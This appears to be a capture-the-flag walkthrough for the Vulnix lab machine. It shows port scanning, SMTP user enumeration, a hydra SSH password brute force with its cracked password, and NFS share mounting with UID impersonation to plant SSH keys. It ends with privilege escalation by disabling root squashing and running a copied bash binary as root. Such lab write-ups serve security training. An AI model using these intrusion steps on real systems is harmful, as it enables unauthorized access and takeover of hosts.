Once the ip of Vulnix is obtained (nmap -sP) our inital nmap scan is ran…
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA) | 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA) |_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 79/tcp open finger Linux fingerd |_finger: No one logged on.\x0D 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: TOP UIDL STLS SASL CAPA RESP-CODES PIPELINING 111/tcp open rpcbind 2-4 (RPC #100000) 143/tcp open imap Dovecot imapd 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped
A few that catch our attention: SMTP/pop3, rpcbind & SSH.
Since VRFY is available, we can do some quick smtp user enumeration.
root@kali:~# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.72.137
We see root as a valid user, along with a non-ordinary user of: user
Using finger against user and root we are able to verify they both have /bin/bash available to them.
root@kali:~# finger email@example.com Login: user Name: user Directory: /home/user Shell: /bin/bash Never logged in. No mail. No Plan. Login: dovenull Name: Dovecot login user Directory: /nonexistent Shell: /bin/false Never logged in.
SSH allows passwords so we run a quick password attack against each user. Using a small password list, root is unsuccessful, but user gets a valid hit.
root@kali:/home# hydra -t 4 -l user -P /home/fasttrack.txt 192.168.72.137 ssh Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-14 08:27:09 [DATA] max 4 tasks per 1 server, overall 64 tasks, 182 login tries (l:1/p:182), ~0 tries per task [DATA] attacking service ssh on port 22 [STATUS] 64.00 tries/min, 64 tries in 00:01h, 118 to do in 00:02h, 4 active [STATUS] 62.00 tries/min, 124 tries in 00:02h, 58 to do in 00:01h, 4 active [ssh] host: 192.168.72.137 login: user password: letmein 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-14 08:30:03 root@kali:/home#
Trying multiple kernal exploits are unsuccessful, so enumerating a bit more (/etc/passwd) another user: vulnix is found. For now the plan will be to work on getting access to this account.
We’ll take a step back and keep in mind we have other services exposed, we can take a closer look at rpc/nfs.
We check the mounted directories…
root@kali:~# showmount -e 192.168.72.137 Export list for 192.168.72.137: /home/vulnix *
It’s a good thing to initially enumerate thoroughly, instead of rushing down possible vectors wasting time in rabbit holes. We could’ve seen vulnix as a user in our initial smtp user enum scan if a little more prior enum was done. Not a big deal in this case, but an just a note.
root@kali:/mnt/vulnix# mount -t nfs 192.168.72.137:/home/vulnix /mnt/vulnix -nolock
We can mount this directory without a problem, but accessing it throws us a permissions error. Since it’s a users home diretory, and ssh is open we can attempt to:
- Create a local user on our Kali machine named: vulnix. The /home/vulnix exists, and we have root privileges (on our kali machine) to create the user for the already existing /home folder.
- Since we can read the victims /etc/passwd file we’ll also set the UID to 2008 to our local vulnix user.
- Accessing this share will then allow use to set generated ssh keys, so we can ssh as vulnix.
First create an ssh folder within the mounted /home/vulnix of:
root@kali:/mnt/vulnix# mkdir .ssh root@kali:/mnt/vulnix# mkdir .ssh/authorized_keys
Now generate the rsa key pair, and we’ll copy the pub key to the authorized_keys folder.
Now ssh as vulnix and you should get a successful login.
Enumerating as vulnix using sudo -l we see is has sudo privs to /etc/exports (No password). Reading this file something sticks out..
/home/vulnix *(rw,root_squash) /root *(rw, no_root_squash)
Change and save to:
/home/vulnix *(rw, no_root_squash)
The NFS service will need to be restarted in order for the changes to be made (vulnix or user doesnt have permissions to do this) - so reboot the VM.
Once mounted again, we can copy our /bin/bash from our local kali root account to the mounted vulnix folder. We will be able to run bash as root with the -p flag. Since root squashing has been disabled, running this copied root bash binary is possible. This will allow full root access to the system.